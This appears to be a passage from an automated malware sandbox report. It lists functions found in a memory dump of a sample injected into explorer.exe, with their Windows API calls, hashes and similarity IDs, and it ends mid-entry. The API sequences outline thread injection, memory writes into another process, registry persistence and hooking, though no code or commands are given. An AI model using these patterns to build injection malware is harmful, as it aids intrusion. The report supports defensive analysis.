Instruction Fuzzy Hash: F461D67020CB098FDB54EF28D899A65BBE5FB98301F10856ED84EC7265DB34D842CF82

Uniqueness

Uniqueness Score: 100.00%

Function 05371E5C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44
registryUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegisterDeviceNotificationA.USER32 ref: 05371E9F

Strings

, xrefs: 05371E8F

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID: DeviceNotificationRegister
String ID:
API String ID: 3632112801-3916222277
Opcode ID: e33e1928f364ea337011fd8c813da1e5ab77d8bbebd6bf42ea7b45465eedd8f3
Instruction ID: bf76dcd5fa6c3836e1a31cc3f27b289ed4148ee1ee8f85eda1124e4b29f5e95f
Opcode Fuzzy Hash: e33e1928f364ea337011fd8c813da1e5ab77d8bbebd6bf42ea7b45465eedd8f3
Instruction Fuzzy Hash: E2F08C32608B088FD754EF29D48865AB7E6FBDC314F004B5EA89ED3604D778DA048B82

Uniqueness

Uniqueness Score: 37.75%

Function 05362558, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL ref: 05362595

Strings

@, xrefs: 05362579

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID: AllocateMemoryVirtual
String ID: @
API String ID: 2167126740-2766056989
Opcode ID: 3480149a3f03a56083bbfdc84b4547b5a69d0fe419a09f2f6cf098ba80d26625
Instruction ID: 4a1921cff290738eef4bdaa48a1590e8a61ab34d49a90f805a16d08f6a2cb72d
Opcode Fuzzy Hash: 3480149a3f03a56083bbfdc84b4547b5a69d0fe419a09f2f6cf098ba80d26625
Instruction Fuzzy Hash: DBF09070615A088FDB54DFA8D8DC53AB6E1F758302F90092DF61BCB258DB7885448742

Uniqueness

Uniqueness Score: 8.94%

Function 0537DBB4, Relevance: 1.7, APIs: 1, Instructions: 205COMMON

Download Yara Rule

APIs

CreateWindowExA.USER32 ref: 0537DD09

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 15c9f6faaa37e9247acfad11c7ef4a89bed5bded4929af5b50f960f1a885f26b
Instruction ID: 606246f9181687a11679e47d06200c889c1d6924df0be93fa604e2411503915f
Opcode Fuzzy Hash: 15c9f6faaa37e9247acfad11c7ef4a89bed5bded4929af5b50f960f1a885f26b
Instruction Fuzzy Hash: FE618170518B4D8BDB68EF28D8986AA77E1FF94315F10492EA88AC2160DF79C545CB82

Uniqueness

Uniqueness Score: 0.01%

Function 05380E70, Relevance: 1.6, APIs: 1, Instructions: 81nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0536AA43), ref: 05380ED8

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 40abf8629fef71ec45f9c6d63d80db8d1a129455cc1696c24eae6b4f8d932d7a
Instruction ID: a1671fa34238374feaafddf2c7c84fa34b2e4ab08bac8555eea31ff05606a1eb
Opcode Fuzzy Hash: 40abf8629fef71ec45f9c6d63d80db8d1a129455cc1696c24eae6b4f8d932d7a
Instruction Fuzzy Hash: D3215C30708F498FEB9CEF6D9898B3676E2FBA8301F454469A54AC3255DBB4D884C742

Uniqueness

Uniqueness Score: 0.01%

Function 053857EC, Relevance: 1.6, APIs: 1, Instructions: 51nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 05385812

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 28b44056cf796de4eb640d76da906fe63571bb67ad8c165bfa38133ab1ad9ada
Instruction ID: fbfeb3710c8e53ea378de15e58ab98b7561497751426a89f4e32cb1ca2e7d64c
Opcode Fuzzy Hash: 28b44056cf796de4eb640d76da906fe63571bb67ad8c165bfa38133ab1ad9ada
Instruction Fuzzy Hash: 15013130718E0D9FDB89EF68D4C5A7573E5FBA8206B44056FA84AC7124DB74D985CB01

Uniqueness

Uniqueness Score: 0.01%

Function 053708F4, Relevance: 1.5, APIs: 1, Instructions: 46nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL ref: 05370940

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
Instruction ID: b00bd3ca6b3fa180ca14d6709468f3875a268ee9d86b181d2b9407f0ca8d44e9
Opcode Fuzzy Hash: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
Instruction Fuzzy Hash: C401D670A08B048FCB48DF69D4C8569BBE1FB58315B10066FE949C7796DB70D885CB45

Uniqueness

Uniqueness Score: 0.01%

Function 053659EC, Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON

Download Yara Rule

APIs

NtReadVirtualMemory.NTDLL ref: 05365A0B

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID: MemoryReadVirtual
String ID:
API String ID: 2834387570-0
Opcode ID: cfc17468bf204698639cbc84dba6562498a06be26e562d427e0299399ff4bd6e
Instruction ID: b652fdbaeb2f5941aba1d742d3ed3b93bca7a73b03e9f7c20a791d99ecf52348
Opcode Fuzzy Hash: cfc17468bf204698639cbc84dba6562498a06be26e562d427e0299399ff4bd6e
Instruction Fuzzy Hash: 72E0DF78724A404BEB20ABB8C8C923877D1F788202F50893DE946C7324E629C8468742

Uniqueness

Uniqueness Score: 0.02%

Function 053808B8, Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL ref: 053808D7

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 62ba6affd158bdae49ea9acc6e39b041216258fa7157e3abd4a7b2d0a9a33b91
Instruction ID: 8d5d5663f0debffc5f88006b4c0e96202268a8bdcbec95a9b5a3482e91f315a5
Opcode Fuzzy Hash: 62ba6affd158bdae49ea9acc6e39b041216258fa7157e3abd4a7b2d0a9a33b91
Instruction Fuzzy Hash: 1CE01274B157444FDB086BF5988D13972D1F748205F00483AE585C7360D7A9C8849642

Uniqueness

Uniqueness Score: 0.03%

Function 05361BD8, Relevance: .3, Instructions: 336COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bb35d48c71e76b8bad92eecc33ebe50439a56691800f2d7f6fc6652ddf5d694
Instruction ID: fed28e6a8fe07349c74c8ef8345ea36b7fab0eaf3861d7d2308018e395ee0891
Opcode Fuzzy Hash: 5bb35d48c71e76b8bad92eecc33ebe50439a56691800f2d7f6fc6652ddf5d694
Instruction Fuzzy Hash: D0B1A430618B098FD764DF1CD895A7AB7E5FB98311F54852DE88AC3254DB74E842CB83

Uniqueness

Uniqueness Score: 0.00%

Function 0537E92C, Relevance: 7.6, APIs: 5, Instructions: 150
fileUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32 ref: 0537E98B
SetFilePointer.KERNEL32 ref: 0537EA20
WriteFile.KERNEL32 ref: 0537EA3D
SetEndOfFile.KERNEL32 ref: 0537EA4A
FindCloseChangeNotification.KERNEL32 ref: 0537EA5F

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID: File$ChangeCloseCreateFindNotificationPointerWrite
String ID:
API String ID: 175865374-0
Opcode ID: 78ca98911488661df1ecb4bda1b0140a29bff18be8d2803c55ae6e5b948b66b0
Instruction ID: 8bd3ca596aa2649b4a65287eb1d9c086313c1413f6ec8f73852b95bc2866f1e2
Opcode Fuzzy Hash: 78ca98911488661df1ecb4bda1b0140a29bff18be8d2803c55ae6e5b948b66b0
Instruction Fuzzy Hash: 51410B3061CA084FE768AF6CE84A33577D5F789325F20526DE49BC32D2EF7C98428646

Uniqueness

Uniqueness Score: 100.00%

Function 05364154, Relevance: 6.2, APIs: 4, Instructions: 234
threadinjectionUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNEL32 ref: 0536425B
ResumeThread.KERNEL32 ref: 05364298
SuspendThread.KERNEL32 ref: 053642BB
VirtualProtectEx.KERNEL32 ref: 05364338

Part of subcall function 053802B0: VirtualProtectEx.KERNEL32 ref: 05380304

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID: ProtectVirtual$Thread$ResumeSuspend
String ID:
API String ID: 964194428-0
Opcode ID: 695bb416bac1cc87e36b157813b3d7e19a5f53d9d2b6c12f7305fae2f417cc9e
Instruction ID: 1c413ebbdb8c62667009d8ff25cba42b60efa0c3a644bfb0411d91e36f6d02af
Opcode Fuzzy Hash: 695bb416bac1cc87e36b157813b3d7e19a5f53d9d2b6c12f7305fae2f417cc9e
Instruction Fuzzy Hash: 5061AD30A0CB084FDBA8EB58E88976AB3D5FB88311F60452DE58FC3255DF74D8468B46

Uniqueness

Uniqueness Score: 100.00%

Function 0536E318, Relevance: 6.1, APIs: 4, Instructions: 146
fileUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32 ref: 0536E3E9
SetFilePointer.KERNEL32 ref: 0536E403
ReadFile.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,053866E9), ref: 0536E425
FindCloseChangeNotification.KERNEL32 ref: 0536E440

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID: File$ChangeCloseCreateFindNotificationPointerRead
String ID:
API String ID: 2405668454-0
Opcode ID: 891f844bcf4124cf303be152b64050e6c158c34e989a9a251bbc060bb9b45e2b
Instruction ID: f2a9028830d1db12b004ae0b24a8b2c5ad9c8e26911b69b1bc52e354a93a5aaa
Opcode Fuzzy Hash: 891f844bcf4124cf303be152b64050e6c158c34e989a9a251bbc060bb9b45e2b
Instruction Fuzzy Hash: AA41EA30218A084FDB59DF28D8C4A6673E2FB84314B248A6ED09BC7255DE74D447CB81

Uniqueness

Uniqueness Score: 23.02%

Function 053737A8, Relevance: 4.7, APIs: 3, Instructions: 169
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 05377BE4: RtlAllocateHeap.NTDLL ref: 05377C1E
Part of subcall function 05377BE4: FindFirstFileW.KERNEL32 ref: 05377CEE

RegOpenKeyA.ADVAPI32 ref: 053738C7
RegSetValueExA.KERNEL32 ref: 053738FB
RegCloseKey.KERNEL32 ref: 05373909

Part of subcall function 05370EB8: CreateFileW.KERNEL32 ref: 05370EF1
Part of subcall function 05370EB8: FindCloseChangeNotification.KERNEL32 ref: 05370F7E

Part of subcall function 0537E92C: CreateFileW.KERNEL32 ref: 0537E98B

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID: File$CloseCreateFind$AllocateChangeFirstHeapNotificationOpenValue
String ID:
API String ID: 4246631597-0
Opcode ID: 58ba0300bac26d695580bce3871055461593879cf0d4b252a0164b53119090d4
Instruction ID: 0da573f80aed0cb9423ebbc394e95307838f180049353b11c88b553cb45b03fd
Opcode Fuzzy Hash: 58ba0300bac26d695580bce3871055461593879cf0d4b252a0164b53119090d4
Instruction Fuzzy Hash: 7F519371608A4C8FDB68EF28D8D8AEA77E2F799300F50892EE44AC3151DF78D545CB81

Uniqueness

Uniqueness Score: 6.84%

Function 05370EB8, Relevance: 4.6, APIs: 3, Instructions: 106
fileUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32 ref: 05370EF1
ReadFile.KERNEL32 ref: 05370F47
FindCloseChangeNotification.KERNEL32 ref: 05370F7E

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID: File$ChangeCloseCreateFindNotificationRead
String ID:
API String ID: 2525391649-0
Opcode ID: c36388d08c24e29bdb2194cc8022c95e2add4d185a8e14df2ae9f0afe5a28739
Instruction ID: d5ec17bdffc163cd706d3c494e9914dba64adb52fc5ae1cf29a10f2438376a44
Opcode Fuzzy Hash: c36388d08c24e29bdb2194cc8022c95e2add4d185a8e14df2ae9f0afe5a28739
Instruction Fuzzy Hash: 2531C830708B0C4FE768EF2D989D36977D5FB98351F50812ED86AC32A0EB78C9458B52

Uniqueness

Uniqueness Score: 100.00%

Function 05364F80, Relevance: 3.2, APIs: 2, Instructions: 202
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 05367650: VirtualProtect.KERNEL32 ref: 05367683

VirtualProtect.KERNEL32 ref: 0536509E
VirtualProtect.KERNEL32 ref: 053650C1

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: a9b66ae03c49d3d670cce81498e72a25c12f1e2e390bf7910731d8dff046be06
Instruction ID: f4139dba6963a22da30b3c6df5b77f097d353fca9a931ef30b46745b40f6cb29
Opcode Fuzzy Hash: a9b66ae03c49d3d670cce81498e72a25c12f1e2e390bf7910731d8dff046be06
Instruction Fuzzy Hash: F7519D70618F098FDB54EF28D889A25B7E0FB58304F50456EE88EC3665EB34E945CBC2

Uniqueness

Uniqueness Score: 0.02%

Function 05376534, Relevance: 3.1, APIs: 2, Instructions: 97
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 053796C4: RegCreateKeyA.ADVAPI32 ref: 053796E7

RegQueryValueExA.KERNEL32 ref: 0537658B
RegCloseKey.KERNEL32 ref: 053765FB

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID: CloseCreateQueryValue
String ID:
API String ID: 4083198587-0
Opcode ID: 55fdfe4b7456eacbb3d02b6717a6ec586e20cf8e62733b169a26c5594a4b745d
Instruction ID: 6f208318d74a0953514f4f1ddbfd8aeb1349fd9a2ef84be68621bfbc01423605
Opcode Fuzzy Hash: 55fdfe4b7456eacbb3d02b6717a6ec586e20cf8e62733b169a26c5594a4b745d
Instruction Fuzzy Hash: 28217430618F088FE754EF28E899B6677D5FB9C351F408529E44AC3265DB34D941DB42

Uniqueness

Uniqueness Score: 0.12%

Function 0536E474, Relevance: 3.1, APIs: 2, Instructions: 67
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 053796C4: RegCreateKeyA.ADVAPI32 ref: 053796E7

RegSetValueExA.KERNEL32 ref: 0536E4D1
RegCloseKey.KERNEL32 ref: 0536E4E6

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID: CloseCreateValue
String ID:
API String ID: 1818849710-0
Opcode ID: f323e17f67b061a2959c80c3fc361c5c7ae4f75424e190da4ef0dd6e4ee8919a
Instruction ID: 8b77021590fb6b3a3f231ed3c6ffaa65774cc13abcbe24470a2c22f144ba0e18
Opcode Fuzzy Hash: f323e17f67b061a2959c80c3fc361c5c7ae4f75424e190da4ef0dd6e4ee8919a
Instruction Fuzzy Hash: E811397460CB0C8F9794EF68944962AB7E5FB9C311F21456EA88EC3321DA74DD428B82

Uniqueness

Uniqueness Score: 0.70%

Function 053796C4, Relevance: 3.1, APIs: 2, Instructions: 60
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyA.ADVAPI32 ref: 053796E7
RegOpenKeyA.ADVAPI32 ref: 053796F4

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID: CreateOpen
String ID:
API String ID: 436179556-0
Opcode ID: 4f2da5dc37d6464ee92d4e41f62eaed1ccd9c1118d19b43c869c43d94e79b462
Instruction ID: 541d0bb046643ba6ee7eb0f375feb42485b82240d9d8e147e1f44e7053ffeedf
Opcode Fuzzy Hash: 4f2da5dc37d6464ee92d4e41f62eaed1ccd9c1118d19b43c869c43d94e79b462
Instruction Fuzzy Hash: 0E01C431A08A488FDB54EF5C9488B2AB7E1FBA8340F04452EE849C3260DAB4C9408B42

Uniqueness

Uniqueness Score: 10.55%

Function 0537DF40, Relevance: 1.7, APIs: 1, Instructions: 216memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32 ref: 0537E08C

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: e3219c7e06d4e1157cb5ead98e94965a76bfb1732a6058a61aaacd14d0df76f9
Instruction ID: c5cbc7e5638f9e80138e875574a02de14ec621d556796d1db82de6a97bca8310
Opcode Fuzzy Hash: e3219c7e06d4e1157cb5ead98e94965a76bfb1732a6058a61aaacd14d0df76f9
Instruction Fuzzy Hash: 6261B770A1CF099FD754EF28D889A6577E5FB68301F50456EE48AC3660EB74E841CB82

Uniqueness

Uniqueness Score: 0.02%

Function 05369188, Relevance: 1.7, APIs: 1, Instructions: 185pipeCOMMON

Download Yara Rule

APIs

ConnectNamedPipe.KERNEL32 ref: 05369201

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID: ConnectNamedPipe
String ID:
API String ID: 2191148154-0
Opcode ID: 2bd9bd677a6faf569487cfe1c49400f833e5f3895b8a3700004c3ced7c6f4f12
Instruction ID: 829aa65729dda4bfb13b5efafd2189fa140d3ee54d4e1848291d3d9a26a7b53a
Opcode Fuzzy Hash: 2bd9bd677a6faf569487cfe1c49400f833e5f3895b8a3700004c3ced7c6f4f12
Instruction Fuzzy Hash: CB5174317186088FD768EF78D89D63A77E2FB98711B24862EE457C61A4DF74C8428B41

Uniqueness

Uniqueness Score: 4.31%

Function 0537AF00, Relevance: 1.7, APIs: 1, Instructions: 175registryCOMMON

Download Yara Rule

APIs

RegGetValueW.KERNEL32 ref: 0537B08E

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 1534dd82049324a1bdbc37dca14e62714e8821e9053a768ba8a60e7408e50437
Instruction ID: 7d4c0895ed79cc33a616cf926dbee0618bf722573d77ec66e211a5b40c79c628
Opcode Fuzzy Hash: 1534dd82049324a1bdbc37dca14e62714e8821e9053a768ba8a60e7408e50437
Instruction Fuzzy Hash: 3451663060CB0D8FD758DF6DD898AA677E1FB98310F00862EA45AC3261EF74D945CB86

Uniqueness

Uniqueness Score: 1.85%

Function 05370DBC, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32 ref: 05370E8C

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 44e6b8eb25501f691a24b2b213f93665653895522283ebdb5027a77fe200c622
Instruction ID: 02c3cd6c3fe0a9e2d87e440b6d73773e7fdf5d20fb387e5df8421f61016b6b5b
Opcode Fuzzy Hash: 44e6b8eb25501f691a24b2b213f93665653895522283ebdb5027a77fe200c622
Instruction Fuzzy Hash: 30215630B18A084BDB6CEB29989D5B973D6FBA8311B14543DE847C3651DF78D9068B81

Uniqueness

Uniqueness Score: 0.16%

Function 05367650, Relevance: 1.6, APIs: 1, Instructions: 77memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32 ref: 05367683

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 639ecdc61c2bcdd9962cdcc3ea4c2965d18f35d31a2eaa775defab5f490dba10
Instruction ID: 43bc47d3064e3deff0d5264f14ede43cc4f7ddc91d6ef9e8b66a404c7fe89748
Opcode Fuzzy Hash: 639ecdc61c2bcdd9962cdcc3ea4c2965d18f35d31a2eaa775defab5f490dba10
Instruction Fuzzy Hash: F711933070CB088F9B24EF2DA84656977E6F798301750463EE84FC3255EA74EC468B83

Uniqueness

Uniqueness Score: 0.02%

Function 05387B45, Relevance: 1.6, APIs: 1, Instructions: 57timeUNIQUE

Download Yara Rule

APIs

SetWaitableTimer.KERNEL32 ref: 05387BB1

Part of subcall function 0536E474: RegSetValueExA.KERNEL32 ref: 0536E4D1
Part of subcall function 0536E474: RegCloseKey.KERNEL32 ref: 0536E4E6

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID: CloseTimerValueWaitable
String ID:
API String ID: 1352355977-0
Opcode ID: 522e3b8ddc82ce709b26fbd5101cabf129a22933c21a32dbab6297c31e15c0d9
Instruction ID: 237f1d9b741c116523a45a6b563f7d3e701a3d218849293602e20ed8e0c9397b
Opcode Fuzzy Hash: 522e3b8ddc82ce709b26fbd5101cabf129a22933c21a32dbab6297c31e15c0d9
Instruction Fuzzy Hash: 0A01B535228F088FDB55EB18D4887AAB7F1FBD8312F040A5DE54AC3155DF75C5418B86

Uniqueness

Uniqueness Score: 100.00%

Function 05387B48, Relevance: 1.6, APIs: 1, Instructions: 55timeUNIQUE

Download Yara Rule

APIs

SetWaitableTimer.KERNEL32 ref: 05387BB1

Part of subcall function 0536E474: RegSetValueExA.KERNEL32 ref: 0536E4D1
Part of subcall function 0536E474: RegCloseKey.KERNEL32 ref: 0536E4E6

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID: CloseTimerValueWaitable
String ID:
API String ID: 1352355977-0
Opcode ID: ca4d44bf5ece1cdf480821b0d3e61287d2bdeb204f11c00d865803a8aab87f27
Instruction ID: 5b585216858d387501be32b4f684929f5a542fbf76d1d4c76d9a274f5040777f
Opcode Fuzzy Hash: ca4d44bf5ece1cdf480821b0d3e61287d2bdeb204f11c00d865803a8aab87f27
Instruction Fuzzy Hash: 8D01B131218F088FDB49EB18D48876AB7E1FBD8311F004A1EE58AC3165DF75C4818B82

Uniqueness

Uniqueness Score: 100.00%

Function 053802B0, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

Part of subcall function 053808B8: NtWriteVirtualMemory.NTDLL ref: 053808D7

VirtualProtectEx.KERNEL32 ref: 05380304

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID: Virtual$MemoryProtectWrite
String ID:
API String ID: 1789425917-0
Opcode ID: 6de53cd7df4643948cefd0012f19627a237aac038176ac540b0f962cdcce38c2
Instruction ID: f1f967be7345890ae4b651b94776ac6361902448acf509f4938ff1eb8ab41423
Opcode Fuzzy Hash: 6de53cd7df4643948cefd0012f19627a237aac038176ac540b0f962cdcce38c2
Instruction Fuzzy Hash: E2012C70618B088FCB48EF5DA4C9525B7E0FB9C311F4045AEE94EC7256DB70D949CB86

Uniqueness

Uniqueness Score: 0.13%

Function 053801C8, Relevance: 1.5, APIs: 1, Instructions: 36synchronizationUNIQUE

Download Yara Rule

APIs

CreateMutexExA.KERNEL32 ref: 05380206

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: cdbc59b39e84fda1efa1d78ac7bd89208423b5a25fb4355e77ae4c72b434434c
Instruction ID: 4a5d040d6c979e82f1a61e769e1f8a2299c351a4b30bb4a193526478cd09913d
Opcode Fuzzy Hash: cdbc59b39e84fda1efa1d78ac7bd89208423b5a25fb4355e77ae4c72b434434c
Instruction Fuzzy Hash: 40F03030358A098FF74CEB6E9C8C63536E2E7AC311F448139A50AC3264DE68D8858742

Uniqueness

Uniqueness Score: 37.75%

Function 053653A4, Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32 ref: 053653CB

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: d9bc5d1970ca43649fb0e4e352f94016590cb923d84703fd2b39bccaa8e65af7
Instruction ID: 31f9ce3949e5acc032398450cb1734c6cb56b7cf04e7c21e2cdff41066364d7f
Opcode Fuzzy Hash: d9bc5d1970ca43649fb0e4e352f94016590cb923d84703fd2b39bccaa8e65af7
Instruction Fuzzy Hash: 48F06D31698A0A8FDB68EF7DE8C552977A1F798214760466EE40AC3258EA34C8828781

Uniqueness

Uniqueness Score: 0.65%

Non-executed Functions

Function 0537C380, Relevance: 4.1, Strings: 3, Instructions: 358COMMON

Download Yara Rule

Strings

rGet, xrefs: 0537C473
rLoa, xrefs: 0537C446
~, xrefs: 0537C5E2

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID:
String ID: rGet$rLoa$~
API String ID: 0-56615508
Opcode ID: 6e86cc886ac250114258902b74e167f175f7a72bea50766b4f14bf808713f4cb
Instruction ID: bbf67d53269c746e76f8a313a103e0da4dee6ba6169d93b1a0193d2ffc5199ba
Opcode Fuzzy Hash: 6e86cc886ac250114258902b74e167f175f7a72bea50766b4f14bf808713f4cb
